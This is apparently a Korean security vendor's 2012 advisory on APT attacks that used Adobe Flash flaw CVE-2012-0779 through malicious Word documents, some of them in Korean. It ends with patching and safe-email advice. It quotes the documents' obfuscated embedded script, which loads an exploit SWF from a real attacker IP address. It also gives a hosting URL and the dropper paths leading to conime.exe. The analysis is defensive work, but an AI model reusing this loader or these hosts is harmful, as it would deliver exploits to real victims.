분석 정보/악성코드 분석 정보

[긴급]CVE-2012-0779 취약점과 한글을 이용한 APT 공격용 발견

TACHYON & ISARC 2012. 5. 8. 18:26
1. 개요


잉카인터넷 대응팀은 최신 Adobe Flash Player 취약점(CVE-2012-0779)을 이용하는 공격을 다수 발견한 상태이며, 특히 한글 MS DOC 문서를 사용한 정황도 포착한 상태이다. 외국뿐만 아니라 한국인을 표적으로 한 공격(APT)에도 사용되고 있는 것으로 추정되고 있는 만큼 인터넷 이용자들은 지금 즉시 Adobe Flash Player 프로그램을 최신 버전으로 업데이트를 설치하여 악의적인 보안위협에 노출되지 않도록 각별한 주의가 필요하다. 또한, 이메일로 수신되는 MS DOC 문서파일이 악성파일 설치에 자주 악용되고 있다는 점에서 발신지가 불분명하거나 자신과 관련되지 않은 내용으로 메일을 받게 될 경우 무분별하게 실행하지 않도록 한다.




2. CVE-2012-0779 악성파일 발견 사례

CVE-2012-0779 보안 취약점을 이용한 다양한 악성파일이 발견되고 있다. 아래 화면은 최근에 잉카인터넷 대응팀이 발견한 종류이고, 한글로 작성된 문서도 확인된 상태이다. 또한, 국내의 특정 사이트가 해킹되어 악성파일 유포에도 악용된 바 있다.

 



■ 2012년 04월 30일 월요일 한글 내용으로 유포된 내용 발견

CVE-2012-0779 취약점을 이용했으면서 한글관련 내용으로 유포된 MS Word 형식의 악성파일이다. 파일이 한글로 작성되어 있다는 점과 악성파일 호스트에 사용된 웹 사이트가 한국이라는 점에서 국내 표적형(APT)공격에 사용되었을 것으로도 추정되고 있다.

파일명은 "유통관련자료_수정본.doc" 이며, 실행하면 다음과 같은 화면이 보여진다.

악성 MS DOC 문서 내부에는 다음과 같이 내부에 포함된 스크립트 코드에 의해서 국내의 특정 URL 사이트로 연결을 시도한다. 이것으로 보아 국내 웹 사이트를 해킹하여 Exploit 파일인 "exp.swf" 악성파일을 사전에 설치해 둔 것도 확인할 수 있다.

해당 웹 사이트에서는 현재 악성 swf 파일이 제거된 상태이다.

[다운로드]
http://(일부생략)tkorea.com/uploadfiles/upload/exp.swf

악성파일은 MS WORD 파일 내부에 XOR로 암호화된 악성 EXE 파일을 포함하고 있다.

이외에도 상기 한글 내용에서 사용한 국내 웹사이트 주소를 동일하게 사용하는 또 다른 악성파일도 추가 존재하는데, 이것은 영문 내용으로 만들어져 있다.


■ 2012년 05월 03일 목요일 외국 발견


"WUC Invitation Letter Guests.doc" 라는 이름의 MS Word 문서파일로 위장한 CVE-2012-0779 취약점 악성파일이 첨부되어 있고, 문서파일이 실행되면 다음과 같은 화면이 보여진다.


DOC 문서 파일 내부에는 다음과 같은 스크립트 코드를 포함하고 있으며, 이를 통해서 악성 플래시 SWF 파일을 로딩 시도하게 된다. SWF 파일은 현재 정상적으로 연결되고 있지 않다.

eval(document.write(unescape('
%3Cembed%20src%3Dhttp://204.45.73.69/essais.swf?info=789c333230d13331d53337d633b3b432313106001af
a0338&infosize=00FC0000%3E%3C/embed%3E')))


악의적인 플래시 파일이 다운로드되고 실행되면 다음과 같은 순서로 최종 악성파일 conime.exe 가 생성되고 실행된다.

① C:\Documents and Settings\[사용자계정]\Application Data\Macromedia\Flash Player\#SharedObjects\temp.exe

② C:\Documents and Settings\[사용자계정]\Application Data\Macromedia\Flash Player\#SharedObjects\Flash_ActiveX.exe

③ C:\Documents and Settings\[사용자계정]\Application Data\conime.exe

3. 마무리

해당 악성파일이 사용하는 보안 취약점(CVE-2012-0779)이 해결된 Adobe Flash Player 11.2.202.235 정식 버전이 배포 중에 있으므로, 지금 즉시 최신 보안 업데이트를 적용하여 관련 취약점을 이용한 보안 위협을 신속하게 패치하도록 한다.

[다운로드]
http://get.adobe.com/kr/flashplayer/

[칼럼]개그콘서트에 없는 네가지? 오해하지마! 보안 업데이트
http://erteam.nprotect.com/250


악성파일에 감염되어 치료를 진행하는 것은 이미 사용자의 입장에서는 어느정도 감염 피해를 입은 후 조치하는 후속 절차 이다. 이와 같이 원치 않는 피해 발생으로 부터 안전하기 위해서는 아래와 같은 "보안 관리 수칙"을 준수하는 등 사용자 스스로의 관심과 노력이 무엇보다 중요하다고 할 수 있다.

※ 보안 관리 수칙

1. 윈도우와 같은 OS 및 각종 응용 프로그램의 최신 보안 패치 생활화.

2. 신뢰할 수 있는 보안업체의 백신을 설치 후 최신 엔진 및 패턴버전으로 업데이트해 실시간 감시 기능을 항상 "ON"상태로 유지하여 사용한다.

3. 출처가 불분명한 이메일에 대한 열람 및 첨부파일에 대한 다운로드/실행을 자제한다.

4. 인스턴트 메신저, SNS 등을 통해 접근이 가능한 링크 접속시 주의


※ 잉카인터넷(시큐리티대응센터/대응팀)에서는 각종 보안 위협에 대비하기 위해 24시간 지속적인 대응체계를 유지하고 있다.